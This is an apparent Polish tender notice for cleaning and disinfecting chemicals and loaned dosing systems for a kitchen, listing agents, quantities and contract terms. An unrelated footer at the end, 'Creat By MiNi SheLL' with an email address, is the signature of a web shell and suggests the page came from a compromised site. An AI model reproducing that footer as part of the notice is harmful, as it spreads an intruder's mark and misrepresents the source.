<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Środki myjąco-dezynfekujące do powierzchni mających kontakt z żywnością.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I. Wymagania dotyczące środków myjąco- dezynfekujących:
Lp.	Nazwa towaru	Ilość /litr
1.Płyn do odkamieniania
Kotłów parowych wykonanych ze stali nierdzewnej,
Środek do usuwania osadów wapiennych posiadających w swoim składzie 30% kwasu fosforowego/ dozownik  w formie rozpryskiwacza	100
2.Płyn do dezynfekcji powierzchni zaplecza kuchennego
Ścian, podłóg, okapów, glazury, stołów produkcyjnych, maszyn oraz wyposażenia ze stali nierdzewnej, tworzyw sztucznych
Środek dezynfekujący na bazie amin czwartorzędowych,  substancja aktywna - chlorek didecylodimetyloamoniowy posiadający zezwolenie jako środek biobójczy działający grzybobójczo i bakteriobójczo. Przygotowanie roztworów roboczych za pomocą dozownika
Orientacyjne zapotrzebowanie na okres 24 m-cy 140l koncentratu uwaga do obliczenia wzięto pod uwagę przykładową wydajność 50l roztworu roboczego z 1 l koncentratu	140
3.Środek do czyszczenia przypalonych tłuszczy w piekarnikach elektrycznych, wykonanych z elementów ze stali nierdzewnej kwasoodpornej, działający samoczynnie bez szorowania, na bazie wodorotlenku potasu 15-25%. / dozowanie za pomocą rozpryskiwacza	16
4.Środek do mycia powierzchni zmywalnych
Ścian, podłóg, glazury, stołów produkcyjnych, maszyn oraz wyposażenia 
ze stali nierdzewnej, tworzyw sztucznych,
Środek do mycia dużych powierzchni, skutecznie rozpuszczający tłuszcze, nieszkodliwy dla środowiska, zawierający wodorotlenek sodu oraz substancje ochronne. Przygotowywanie roztworów roboczych za pomocą dozownika. 
Orientacyjne zapotrzebowanie na okres 24 m-cy 260l koncentratu uwaga do obliczenia wzięto pod uwagę przykładową wydajność 100l roztworu roboczego z 1 l koncentratu	260
II. Wymagania dotyczące systemów dozujących:
1. Wykonawca jest zobowiązany do zapewnienia systemów dozujących  z wężem ok. 10m pod ciśnieniem w ilości 3 szt.(dozowniki będą stosowane do środków opisanych w poz. 2 i 4).
2. Wykonawca zobowiązany jest do użyczenia i zamontowania systemów dozujących 
w miejscu wskazanym przez Zamawiającego (przy ujęciach wody ciepłej) na czas trwania umowy.
3. Systemy dozujące są własnością Wykonawcy i po terminie, w którym strony przestają być związane umową podlegają demontażowi przez Wykonawcę na własny koszt.
4. Wykonawca zobowiązany jest przynajmniej raz na kwartał dokonać przeglądu dozowników w celu sprawdzenia i regulacji stężeń środków chemicznych przez cały okres trwania umowy. Wykonawca jest zobowiązany do potwierdzenia wykonania przeglądu dozowników na piśmie. W przypadku awarii dozownika Wykonawca zobowiązany jest do usunięcia wady w ciągu 3 dni od daty otrzymania zgłoszenia. 
W przypadku gdy usunięcie awarii będzie wymagało więcej czasu Wykonawca zobowiązany jest zamontować zastępczy dozownik
5. Zamawiający zastrzega, że ilość dozowników może ulec zmianie ze względu na potrzebę ich zamontowania w innym miejscu albo ich likwidację. O wszelkich zmianach Wykonawca zostanie powiadomiony na piśmie.
6. Wykonawca zobowiązany jest do załączenia do oferty katalogów lub szczegółowych opisów oferowanych dozowników.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.00.00-9, 39.83.12.20-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com